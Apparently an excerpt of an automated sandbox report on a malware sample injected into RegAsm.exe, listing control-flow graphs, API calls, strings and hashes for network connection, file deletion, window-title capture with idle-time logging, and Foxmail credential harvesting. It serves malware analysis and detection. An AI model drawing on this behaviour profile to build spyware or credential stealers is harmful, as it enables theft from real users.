                                                          • Opcode Fuzzy Hash: 86b0354fb495a99297697fe6ef04b294736cc3efcbebce0c6d492a8aa7b6887a
                                                          • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 565 414f2a-414f72 call 4020df call 41b8b3 call 4020df call 401e65 call 401fab call 43baac 578 414f81-414fcd call 402093 call 401e65 call 4020f6 call 41be1b call 40489e call 401e65 call 40b9bd 565->578 579 414f74-414f7b Sleep 565->579 594 415041-4150dc call 402093 call 401e65 call 4020f6 call 41be1b call 401e65 * 2 call 406c1e call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 578->594 595 414fcf-41503e call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 578->595 579->578 648 4150ec-4150f3 594->648 649 4150de-4150ea 594->649 595->594 650 4150f8-41518a call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414ee9 648->650 649->650 677 4151d5-4151e3 call 40482d 650->677 678 41518c-415197 WSAGetLastError call 41cae1 650->678 683 415210-415225 call 404f51 call 4048c8 677->683 684 4151e5-41520b call 402093 * 2 call 41b4ef 677->684 682 41519c-4151d0 call 4052fd call 402093 call 41b4ef call 401fd8 678->682 700 415aa3-415ab5 call 404e26 call 4021fa 682->700 683->700 701 41522b-41537e call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 4 call 41b7e0 call 4145bd call 40905c call 441e81 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 4136f8 683->701 684->700 714 415ab7-415ad7 call 401e65 call 401fab call 43baac Sleep 700->714 715 415add-415ae5 call 401e8d 700->715 765 415380-41538d call 405aa6 701->765 766 415392-4153b9 call 401fab call 4135a6 701->766 714->715 715->594 765->766 772 4153c0-415485 call 40417e call 40dd89 call 41bc42 call 41bd1e call 41bb8e call 401e65 GetTickCount call 41bb8e call 41bae6 call 41bb8e * 2 call 41ba96 766->772 773 4153bb-4153bd 766->773 796 41548a-415a16 call 41bd1e * 5 call 40f8d1 call 41bd1e call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 772->796 773->772 1019 415a18-415a1f 796->1019 1020 415a2a-415a31 796->1020 1019->1020 1023 415a21-415a23 1019->1023 1021 415a33-415a38 call 40b051 1020->1021 1022 415a3d-415a6f call 405a6b call 402093 * 2 call 41b4ef 1020->1022 1021->1022 1034 415a71-415a7d CreateThread 1022->1034 1035 415a83-415a9e call 401fd8 * 2 call 401f09 1022->1035 1023->1020 1034->1035 1035->700
                                                          APIs
                                                          • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414F7B
                                                          • WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
                                                          • Sleep.KERNEL32(00000000,00000002), ref: 00415AD7
                                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep$ErrorLastLocalTime
                                                          • String ID: | $%I64u$5.1.0 Pro$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG$y\$[
                                                          • API String ID: 524882891-2628094023
                                                          • Opcode ID: ac84c56cea5f4817d09263526f44d78f6cb26473d63e2e782a7e6842411a7dc9
                                                          • Instruction ID: 324fc11d7bea0fba9c16e2c7d7b547a311b01f704130931fc4cc70caa797af2d
                                                          • Opcode Fuzzy Hash: ac84c56cea5f4817d09263526f44d78f6cb26473d63e2e782a7e6842411a7dc9
                                                          • Instruction Fuzzy Hash: 22526B31A001155ACB18F732DD96AFE73769F90344F6041BFE40A761E2EF781E858A5D

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1042 412ab4-412afd GetModuleFileNameW call 4020df * 3 1049 412aff-412b89 call 41b978 call 401fab call 40d9e8 call 401fd8 call 41b978 call 401fab call 40d9e8 call 401fd8 call 41b978 call 401fab call 40d9e8 call 401fd8 1042->1049 1074 412b8b-412c1b call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 418568 call 401f09 * 4 1049->1074 1097 412c2b 1074->1097 1098 412c1d-412c25 Sleep 1074->1098 1099 412c2d-412cbd call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 418568 call 401f09 * 4 1097->1099 1098->1074 1098->1097 1122 412ccd 1099->1122 1123 412cbf-412cc7 Sleep 1099->1123 1124 412ccf-412d5f call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 418568 call 401f09 * 4 1122->1124 1123->1099 1123->1122 1147 412d61-412d69 Sleep 1124->1147 1148 412d6f-412d94 1124->1148 1147->1124 1147->1148 1149 412d98-412db4 call 401f04 call 41c485 1148->1149 1154 412db6-412dc5 call 401f04 DeleteFileW 1149->1154 1155 412dcb-412de7 call 401f04 call 41c485 1149->1155 1154->1155 1162 412e04 1155->1162 1163 412de9-412e02 call 401f04 DeleteFileW 1155->1163 1165 412e08-412e24 call 401f04 call 41c485 1162->1165 1163->1165 1171 412e26-412e38 call 401f04 DeleteFileW 1165->1171 1172 412e3e-412e40 1165->1172 1171->1172 1174 412e42-412e44 1172->1174 1175 412e4d-412e58 Sleep 1172->1175 1174->1175 1177 412e46-412e4b 1174->1177 1175->1149 1178 412e5e-412e70 call 406b28 1175->1178 1177->1175 1177->1178 1181 412e72-412e80 call 406b28 1178->1181 1182 412ec6-412ee5 call 401f09 * 3 1178->1182 1181->1182 1188 412e82-412e90 call 406b28 1181->1188 1193 412eea-412f23 call 40b904 call 401f04 call 4020f6 call 41322d 1182->1193 1188->1182 1194 412e92-412ebe Sleep call 401f09 * 3 1188->1194 1209 412f28-412f4e call 401f09 call 405b05 1193->1209 1194->1049 1208 412ec4 1194->1208 1208->1193 1214 412f54-4130a3 call 41bd1e call 41bb8e call 402f31 call 402f10 * 6 call 402ea1 call 402f10 call 402ea1 call 404aa1 call 401fd8 * 10 1209->1214 1215 4130a8-4131a1 call 41bd1e call 402f31 call 402f10 * 6 call 402ea1 call 404aa1 call 401fd8 * 7 1209->1215 1284 4131a5-41322c call 401fd8 call 401f09 call 401fd8 * 9 1214->1284 1215->1284
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                                                            • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,63791986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                            • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
                                                            • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587
                                                          • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                                                          • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                                                          • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                                                          • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                                                          • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                                                          • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                                                          • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                                                          • Sleep.KERNEL32(00000064), ref: 00412E94
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                          • String ID: /stext "$0TG$0TG$NG$NG
                                                          • API String ID: 1223786279-2576077980
                                                          • Opcode ID: 254a2c7f9f69d88497661e7680345195c5603b6f94828ce8630fd8ec0e96792e
                                                          • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                                                          • Opcode Fuzzy Hash: 254a2c7f9f69d88497661e7680345195c5603b6f94828ce8630fd8ec0e96792e
                                                          • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A

                                                          Control-flow Graph

                                                          APIs
                                                          • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                            • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                                                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                            • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                            • Part of subcall function 100010F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                            • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                          • lstrlenW.KERNEL32(?), ref: 100014C5
                                                          • lstrlenW.KERNEL32(?), ref: 100014E0
                                                          • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                          • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                          • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                          • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                          • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                          • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                          • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                          • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                          • String ID: )$Foxmail$ProgramFiles
                                                          • API String ID: 672098462-2938083778
                                                          • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                          • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                          • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                          • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1357 414d86-414dc2 1358 414dc8-414ddd GetSystemDirectoryA 1357->1358 1359 414edd-414ee8 1357->1359 1360 414ed3 1358->1360 1361 414de3-414e2f call 441a3e call 441a98 LoadLibraryA 1358->1361 1360->1359 1366 414e31-414e3b GetProcAddress 1361->1366 1367 414e46-414e80 call 441a3e call 441a98 LoadLibraryA 1361->1367 1368 414e42-414e44 1366->1368 1369 414e3d-414e40 FreeLibrary 1366->1369 1380 414e82-414e8c GetProcAddress 1367->1380 1381 414ecf-414ed2 1367->1381 1368->1367 1371 414e97 1368->1371 1369->1368 1373 414e99-414eaa GetProcAddress 1371->1373 1375 414eb4-414eb7 FreeLibrary 1373->1375 1376 414eac-414eb0 1373->1376 1379 414eb9-414ebb 1375->1379 1376->1373 1378 414eb2 1376->1378 1378->1379 1379->1381 1382 414ebd-414ecd 1379->1382 1383 414e93-414e95 1380->1383 1384 414e8e-414e91 FreeLibrary 1380->1384 1381->1360 1382->1381 1382->1382 1383->1371 1383->1381 1384->1383
                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                                          • LoadLibraryA.KERNEL32(?), ref: 00414E17
                                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                                          • LoadLibraryA.KERNEL32(?), ref: 00414E76
                                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                          • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                          • API String ID: 2490988753-744132762
                                                          • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                                          • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                                                          • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                                          • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE

                                                          Control-flow Graph

                                                          APIs
                                                          • Sleep.KERNEL32(00001388), ref: 0040A740
                                                            • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
                                                            • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                                            • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                                            • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000), ref: 0040A6EE
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                                                          • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                                                          • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040A81E
                                                            • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                                          • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                          • String ID: pQG$pQG$PG$PG$[
                                                          • API String ID: 3795512280-2974276880
                                                          • Opcode ID: 9246c906b51f7ef76b321572192bfb08ffa2a7cb594671af2c3c76767c77d2b9
                                                          • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                                                          • Opcode Fuzzy Hash: 9246c906b51f7ef76b321572192bfb08ffa2a7cb594671af2c3c76767c77d2b9
                                                          • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1483 4048c8-4048e8 connect 1484 404a1b-404a1f 1483->1484 1485 4048ee-4048f1 1483->1485 1488 404a21-404a2f WSAGetLastError 1484->1488 1489 404a97 1484->1489 1486 404a17-404a19 1485->1486 1487 4048f7-4048fa 1485->1487 1490 404a99-404a9e 1486->1490 1491 404926-404930 call 420c60 1487->1491 1492 4048fc-404923 call 40531e call 402093 call 41b4ef 1487->1492 1488->1489 1493 404a31-404a34 1488->1493 1489->1490 1503 404941-40494e call 420e8f 1491->1503 1504 404932-40493c 1491->1504 1492->1491 1496 404a71-404a76 1493->1496 1497 404a36-404a6f call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 1493->1497 1499 404a7b-404a94 call 402093 * 2 call 41b4ef 1496->1499 1497->1489 1499->1489 1517 404950-404973 call 402093 * 2 call 41b4ef 1503->1517 1518 404987-404992 call 421a40 1503->1518 1504->1499 1544 404976-404982 call 420ca0 1517->1544 1529 4049c4-4049d1 call 420e06 1518->1529 1530 404994-4049c2 call 402093 * 2 call 41b4ef call 4210b2 1518->1530 1540 4049d3-4049f6 call 402093 * 2 call 41b4ef 1529->1540 1541 4049f9-404a14 CreateEventW * 2 1529->1541 1530->1544 1540->1541 1541->1486 1544->1489
                                                          APIs
                                                          • connect.WS2_32(FFFFFFFF,00AB4960,00000010), ref: 004048E0
                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                          • WSAGetLastError.WS2_32 ref: 00404A21
                                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                          • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                          • API String ID: 994465650-2151626615
                                                          • Opcode ID: 8cbd5fa0ca9eeef476573a06e44a2f6eac46da9232bd84f10084e17915cae65e
                                                          • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                                                          • Opcode Fuzzy Hash: 8cbd5fa0ca9eeef476573a06e44a2f6eac46da9232bd84f10084e17915cae65e
                                                          • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF

                                                          Control-flow Graph

                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                          • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                          • CloseHandle.KERNEL32(?), ref: 00404E4C
                                                          • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                          • CloseHandle.KERNEL32(?), ref: 00404EBF
                                                          • CloseHandle.KERNEL32(?), ref: 00404EC4
                                                          • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                          • CloseHandle.KERNEL32(?), ref: 00404ED6
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                          • String ID:
                                                          • API String ID: 3658366068-0
                                                          • Opcode ID: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                                          • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                                                          • Opcode Fuzzy Hash: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                                          • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58

                                                          Control-flow Graph

                                                          APIs
                                                          • __Init_thread_footer.LIBCMT ref: 0040AD38
                                                          • Sleep.KERNEL32(000001F4), ref: 0040AD43
                                                          • GetForegroundWindow.USER32 ref: 0040AD49
                                                          • GetWindowTextLengthW.USER32 ref: 0040AD52
                                                          • GetWindowTextW.USER32 ref: 0040AD86
                                                          • Sleep.KERNEL32(000003E8), ref: 0040AE54
                                                            • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                          • String ID: [${ User has been idle for $ minutes }$]
                                                          • API String ID: 911427763-3954389425
                                                          • Opcode ID: 11deb2e1d1f8f3844bb158fc8ccdcdbeb0aecbc925d29af6944428c3672480c4
                                                          • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
                                                          • Opcode Fuzzy Hash: 11deb2e1d1f8f3844bb158fc8ccdcdbeb0aecbc925d29af6944428c3672480c4
                                                          • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1655 40da34-40da59 call 401f86 1658 40db83-40dc1b call 401f04 GetLongPathNameW call 40417e * 2 call 40ddd1 call 402fa5 * 2 call 401f09 * 5 1655->1658 1659 40da5f 1655->1659 1660 40da70-40da7e call 41b5b4 call 401f13 1659->1660 1661 40da91-40da96 1659->1661 1662 40db51-40db56 1659->1662 1663 40daa5-40daac call 41bfb7 1659->1663 1664 40da66-40da6b 1659->1664 1665 40db58-40db5d 1659->1665 1666 40da9b-40daa0 1659->1666 1667 40db6e 1659->1667 1668 40db5f-40db6c call 43c0cf 1659->1668 1689 40da83 1660->1689 1671 40db73 call 43c0cf 1661->1671 1662->1671 1680 40db00-40db4c call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1663->1680 1681 40daae-40dafe call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1663->1681 1664->1671 1665->1671 1666->1671 1667->1671 1668->1667 1682 40db79-40db7e call 409057 1668->1682 1683 40db78 1671->1683 1680->1689 1694 40da87-40da8c call 401f09 1681->1694 1682->1658 1683->1682 1689->1694 1694->1658
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LongNamePath
                                                          • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                          • API String ID: 82841172-425784914
                                                          • Opcode ID: 1365f17b8726d1e4c30e610cfd72c1161db55c192115e3ec262d1ce1c247f70f
                                                          • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                                                          • Opcode Fuzzy Hash: 1365f17b8726d1e4c30e610cfd72c1161db55c192115e3ec262d1ce1c247f70f
                                                          • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1754 44ac49-44ac62 1755 44ac64-44ac74 call 446766 1754->1755 1756 44ac78-44ac7d 1754->1756 1755->1756 1764 44ac76 1755->1764 1758 44ac7f-44ac87 1756->1758 1759 44ac8a-44acae MultiByteToWideChar 1756->1759 1758->1759 1761 44acb4-44acc0 1759->1761 1762 44ae41-44ae54 call 434fcb 1759->1762 1765 44ad14 1761->1765 1766 44acc2-44acd3 1761->1766 1764->1756 1770 44ad16-44ad18 1765->1770 1767 44acd5-44ace4 call 457190 1766->1767 1768 44acf2-44ad03 call 446137 1766->1768 1773 44ae36 1767->1773 1779 44acea-44acf0 1767->1779 1768->1773 1780 44ad09 1768->1780 1770->1773 1774 44ad1e-44ad31 MultiByteToWideChar 1770->1774 1778 44ae38-44ae3f call 435e40 1773->1778 1774->1773 1777 44ad37-44ad49 call 448bb3 1774->1777 1784 44ad4e-44ad52 1777->1784 1778->1762 1783 44ad0f-44ad12 1779->1783 1780->1783 1783->1770 1784->1773 1786 44ad58-44ad5f 1784->1786 1787 44ad61-44ad66 1786->1787 1788 44ad99-44ada5 1786->1788 1787->1778 1789 44ad6c-44ad6e 1787->1789 1790 44ada7-44adb8 1788->1790 1791 44adf1 1788->1791 1789->1773 1792 44ad74-44ad8e call 448bb3 1789->1792 1794 44add3-44ade4 call 446137 1790->1794 1795 44adba-44adc9 call 457190 1790->1795 1793 44adf3-44adf5 1791->1793 1792->1778 1806 44ad94 1792->1806 1797 44adf7-44ae10 call 448bb3 1793->1797 1798 44ae2f-44ae35 call 435e40 1793->1798 1794->1798 1810 44ade6 1794->1810 1795->1798 1809 44adcb-44add1 1795->1809 1797->1798 1812 44ae12-44ae19 1797->1812 1798->1773 1806->1773 1811 44adec-44adef 1809->1811 1810->1811 1811->1793 1813 44ae55-44ae5b 1812->1813 1814 44ae1b-44ae1c 1812->1814 1815 44ae1d-44ae2d WideCharToMultiByte 1813->1815 1814->1815 1815->1798 1816 44ae5d-44ae64 call 435e40 1815->1816 1816->1778
                                                          APIs
